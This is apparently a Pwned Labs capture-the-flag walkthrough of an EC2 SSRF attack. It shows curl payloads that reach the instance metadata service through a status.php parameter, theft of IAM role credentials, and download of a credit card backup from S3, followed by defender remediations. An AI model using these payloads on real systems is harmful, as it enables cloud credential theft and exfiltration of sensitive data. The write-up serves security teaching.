EC2 SSRF Attack

A walkthrough demonstrating a Server-Side Request Forgery attack leading to credit card data exfiltration.

CTF Source: Pwned Labs


In this walkthrough, we'll perform a Server-Side Request Forgery (SSRF) attack leading to the compromise and exfiltration of credit card data. The lab mimics the 2019 Capital One data breach, which also involved exploiting SSRF, abusing EC2's metadata service, and obtaining credentials for an IAM role.


  • Install awscli: `brew install awscli` (macOS) or `apt install awscli` (Linux)


Accessing the website & identifying the server

We start our engagement with an IP address and are led to believe it goes to a website.

When attempting to access the website in the browser, it redirects to http://hugelogistics.pwn/

We can also confirm this with `curl -I` to see the headers:

HTTP/1.1 301 Moved Permanently
Date: Wed, 03 Jan 2024 22:50:19 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://hugelogistics.pwn/
Content-Type: text/html; charset=iso-8859-1

We can update our `/etc/hosts` file like so, allowing us to view the webpage:

sudo -- sh -c "echo '<target-ip> hugelogistics.pwn' >> /etc/hosts"
  • `sudo` since `/etc/hosts` requires elevated permissions

  • `sh` to execute a shell command

  • `-c` to enable reading the string as a command
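To sanity-check the mapping without opening a browser, we can append the entry and then grep for it. The sketch below writes to a local test file with a placeholder IP; on a real system you'd target `/etc/hosts` (with sudo) and substitute the lab's actual address:

```shell
# Placeholder values: substitute the lab's real target IP,
# and use /etc/hosts (with sudo) on a real system.
TARGET_IP="203.0.113.10"
HOSTS_FILE="./hosts.test"

# Same append as the sudo one-liner above
echo "$TARGET_IP hugelogistics.pwn" >> "$HOSTS_FILE"

# Confirm the mapping is present
grep "hugelogistics.pwn" "$HOSTS_FILE"
```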

Now, we can view the webpage

If we want to understand who owns the website, we can run `whois` and see it’s an Amazon IP, specifically one allocated to EC2.

OrgAbuseHandle: AEA8-ARIN
OrgAbuseName:   Amazon EC2 Abuse
OrgAbusePhone:  +1-206-555-0000 

We can also run `nslookup` to confirm the public DNS hostname of the EC2 instance.


Non-authoritative answer:

We also learn this instance is in the us-east-1 region, according to Amazon’s documentation:

A public (external) IPv4 DNS hostname takes the form ec2-public-ipv4-address.compute-1.amazonaws.com for the us-east-1 Region, and ec2-public-ipv4-address.region.compute.amazonaws.com for other Regions.
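That naming convention can be checked mechanically. Here's a small sketch (the hostname below is made up for illustration) that pulls the region out of an EC2 public DNS name, treating the legacy `compute-1` label as us-east-1:

```shell
# Hypothetical EC2 public DNS hostname for illustration
DNS_NAME="ec2-18-208-0-1.compute-1.amazonaws.com"

# us-east-1 uses the legacy "compute-1" label; other regions embed
# the region directly, e.g. ec2-1-2-3-4.eu-west-1.compute.amazonaws.com
LABEL=$(echo "$DNS_NAME" | cut -d. -f2)
if [ "$LABEL" = "compute-1" ]; then
  REGION="us-east-1"
else
  REGION="$LABEL"
fi

echo "$REGION"
```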

Identifying the backend storage

Let’s take a look at the website source code.

<!-- shipping -->
<section class="shipping py-5">
	<div class="container py-lg-5 py-md-3">
		<div class="row">
			<div class="col-lg-5 p-md-0">
				<img src="" alt="" class="img-fluid"/>
			<div class="col-lg-7 p-0 mt-lg-0 mt-4">

We can see the website uses S3 as its storage backend. Let’s try to access the bucket contents.

aws s3 ls s3://huge-logistics-storage/ --no-sign-request --recursive
  • `--no-sign-request` is needed so we’re not signing the request with any local AWS credentials

  • `--recursive` will try enumerating the full bucket contents

2023-05-31 16:14:05          0 backup/
2023-05-31 16:14:47       3717 backup/cc-export2.txt
2023-06-01 08:38:27         32 backup/flag.txt
2023-05-31 14:40:47          0 web/
2023-05-31 14:42:33     114886 web/images/about.jpg
2023-05-31 14:42:34     271657 web/images/banner.jpg
2023-05-31 14:42:35      48441 web/images/blog1.jpg
2023-05-31 14:42:36      32805 web/images/blog2.jpg
2023-05-31 14:42:36      44570 web/images/blog3.jpg
2023-05-31 14:42:37      20032 web/images/executive.jpg
2023-05-31 14:42:37      13368 web/images/manager.jpg
2023-05-31 14:42:38      18260 web/images/manager1.jpg
2023-05-31 14:42:38      42216 web/images/signature.jpg

As we can see, there’s a ton of data in the bucket. The `backup/` folder looks interesting. Can we copy it locally?

aws s3 cp s3://huge-logistics-storage/backup/ . --no-sign-request --recursive

download failed: s3://huge-logistics-storage/backup/cc-export2.txt to ./cc-export2.txt An error occurred (AccessDenied) when calling the GetObject operation: Access Denied
download failed: s3://huge-logistics-storage/backup/flag.txt to ./flag.txt An error occurred (AccessDenied) when calling the GetObject operation: Access Denied

Unfortunately not.

Identifying and Exploiting an SSRF Vulnerability

Heading back to the website we find the Status page in the menu bar.

Clicking this takes us to a webpage that appears to run a PHP script when clicking the Check button.

Looking at the website source code, we can assume it’s taking `hugelogisticsstatus.pwn` and sending it to the server.

So, we know this website is hosted on EC2, as we discovered earlier.

EC2 has a metadata service that is available at the link-local address `http://169.254.169.254/`.

If the PHP script is not doing proper validation, we could attempt to access this service.

With the Instance Metadata Service (IMDS), we can find out a ton of information about the instance, such as whether it has an IAM role assigned to it.

We can also inspect any user data, such as initialization scripts admins might use to configure the EC2 instance, which may contain credentials.
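Putting that together, the payloads are just the status endpoint with its `name` parameter pointed at IMDS paths. A sketch of the URLs we might try (the `status.php?name=` endpoint comes from the site; the IMDS paths are the standard ones):

```shell
# Vulnerable endpoint observed on the site
BASE="http://hugelogistics.pwn/status/status.php?name="
# Link-local IMDS address (IMDSv1 needs no authentication)
IMDS="http://169.254.169.254/latest"

# Candidate targets: general metadata, IAM info, and user data
META_URL="${BASE}${IMDS}/meta-data/"
IAM_URL="${BASE}${IMDS}/meta-data/iam/info"
USERDATA_URL="${BASE}${IMDS}/user-data"

echo "$META_URL"
```

Each URL would then be fetched with `curl "$META_URL"` and so on.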

Let’s give it a shot! We can attempt this in either the browser or the terminal. I’ll use the terminal.

curl http://hugelogistics.pwn/status/status.php?name=http://hugelogistics.pwn

We don’t get anything back other than the website code. Let’s try to check the meta-data instead.

curl http://hugelogistics.pwn/status/status.php?name=http://169.254.169.254/latest/meta-data/


Success! We can access data on the instance. Let’s find out if an IAM role/credentials are tied to this EC2.

We can assume it might, since the website is pulling data from S3.

If we look at Amazon’s documentation, we’ll first try the `iam/info` category:

curl http://hugelogistics.pwn/status/status.php?name=http://169.254.169.254/latest/meta-data/iam/info

  "Code" : "Success",
  "LastUpdated" : "2024-01-03T23:24:05Z",
  "InstanceProfileArn" : "arn:aws:iam::[snip]:instance-profile/MetapwnedS3Access",
  "InstanceProfileId" : "AIPARQV[snip]"

And look at that! We just confirmed the EC2 instance has an instance profile assigned to it. Let’s grab the name `MetapwnedS3Access` and query the `iam/security-credentials` category to grab its credentials.

curl http://hugelogistics.pwn/status/status.php?name=http://169.254.169.254/latest/meta-data/iam/security-credentials/MetapwnedS3Access

  "Code" : "Success",
  "LastUpdated" : "2024-01-03T23:24:35Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIARQV[snip]",
  "SecretAccessKey" : "wj+h4gVHo[snip]",
  "Token" : "IQoJb3JpZ2[snip]",
  "Expiration" : "2024-01-04T05:38:34Z"

Are you as excited as I am right now?


Let’s configure our local AWS credentials and attempt to use the ones we just found.

Just run `aws configure` and it’ll prompt you to copy/paste the `AccessKeyId` and `SecretAccessKey`.

After that, we’ll need to add the `Token`, since these are an IAM role’s temporary credentials. We can do it like so:

aws configure set aws_session_token IQoJb3JpZ[snip]
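Alternatively, the AWS CLI reads credentials from environment variables, which avoids touching `~/.aws` entirely. A sketch with dummy values, using `sed` to pull the fields out of the IMDS JSON response (use `jq` instead if you have it):

```shell
# Dummy stand-in for the IMDS security-credentials response
RESP='{"AccessKeyId":"ASIAEXAMPLE","SecretAccessKey":"wJalrEXAMPLEKEY","Token":"IQoJbEXAMPLETOKEN"}'

# Crude JSON field extraction with sed; the AWS CLI picks these
# environment variables up automatically
export AWS_ACCESS_KEY_ID=$(printf '%s' "$RESP" | sed -n 's/.*"AccessKeyId":"\([^"]*\)".*/\1/p')
export AWS_SECRET_ACCESS_KEY=$(printf '%s' "$RESP" | sed -n 's/.*"SecretAccessKey":"\([^"]*\)".*/\1/p')
export AWS_SESSION_TOKEN=$(printf '%s' "$RESP" | sed -n 's/.*"Token":"\([^"]*\)".*/\1/p')

echo "$AWS_ACCESS_KEY_ID"
```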

Next, we’ll run a command to check our identity, similar to running `whoami`:

aws sts get-caller-identity

    "UserId": "AROARQV[snip]:i-0199bf97fb9d996f1",
    "Account": "[snip]",
    "Arn": "arn:aws:sts::[snip]:assumed-role/MetapwnedS3Access/i-0199bf97fb9d996f1"

Nice. Let’s see what permissions we have by inspecting our attached IAM policies. This will check for any managed policies attached to our role.

aws iam list-attached-role-policies --role-name MetapwnedS3Access

An error occurred (AccessDenied) when calling the ListAttachedRolePolicies operation: User: arn:aws:sts::[snip]:assumed-role/MetapwnedS3Access/i-0199bf97fb9d996f1 is not authorized to perform: iam:ListAttachedRolePolicies on resource: role MetapwnedS3Access because no identity-based policy allows the iam:ListAttachedRolePolicies action

Bummer. No permission to view this. Well, let’s see if we can view inline policies.

aws iam list-role-policies --role-name MetapwnedS3Access         

An error occurred (AccessDenied) when calling the ListRolePolicies operation: User: arn:aws:sts::[snip]:assumed-role/MetapwnedS3Access/i-0199bf97fb9d996f1 is not authorized to perform: iam:ListRolePolicies on resource: role MetapwnedS3Access because no identity-based policy allows the iam:ListRolePolicies action

Okay, no dice. Not to fret; this was just an attempt to enumerate all the permissions this IAM role has. We can assume it has access to the S3 bucket we discovered earlier.

Accessing the S3 Bucket Files

Let’s try and access those backup files.

aws s3 cp s3://huge-logistics-storage/backup/ . --recursive 

download: s3://huge-logistics-storage/backup/flag.txt to ./flag.txt
download: s3://huge-logistics-storage/backup/cc-export2.txt to ./cc-export2.txt
cat cc-export2.txt  
VISA, 4929854977595222, 5/2028, 733
VISA, 4532044427558124, 7/2024, 111
VISA, 4539773096403690, 12/2028, 429
cat flag.txt 

Success! We discovered the flag and what appear to be plaintext credit card numbers!


So, much like the attackers who breached Capital One in 2019, we performed a Server-Side Request Forgery (SSRF) attack.

This led to us gaining access to the EC2 instance’s IMDS, discovering the instance role’s credentials, and gaining access to an S3 bucket used both for the static website it hosted and for sensitive credit card data.

From a defender’s perspective, there are a few things that should be addressed.

  1. The S3 bucket was being used for multiple functions (hosting a website and storing credit card data)

    • These should have been separate buckets - especially for something as sensitive as the CC data

    • Multiple functions mean more complicated permissions, which can lead to misconfigurations and errors

  2. The S3 bucket contents could be seen by anyone in the world

    • This is what piqued our interest when we saw backup/cc-export2.txt, and it should have been prevented

  3. The PHP script wasn’t using proper input validation

    • This allowed us to access IMDS

  4. IMDS

    • If the service isn’t needed, it can be disabled (see Example 2)

    • If it’s needed, use IMDSv2, which requires session tokens for authentication with the service. However, an attack like this one can still be possible if the SSRF vulnerability lets an attacker issue the PUT request and header needed to generate a session token (see Amazon doc)
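As a sketch of the remediation, both options are a single `modify-instance-metadata-options` call. These require live AWS credentials to actually run; the instance ID below is the one we saw in the assumed-role ARN earlier:

```shell
# Instance ID taken from the caller-identity output seen earlier
INSTANCE_ID="i-0199bf97fb9d996f1"

# Option A: require IMDSv2 session tokens on the instance
aws ec2 modify-instance-metadata-options \
    --instance-id "$INSTANCE_ID" \
    --http-tokens required

# Option B: disable the metadata endpoint entirely (only if nothing needs it)
aws ec2 modify-instance-metadata-options \
    --instance-id "$INSTANCE_ID" \
    --http-endpoint disabled
```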
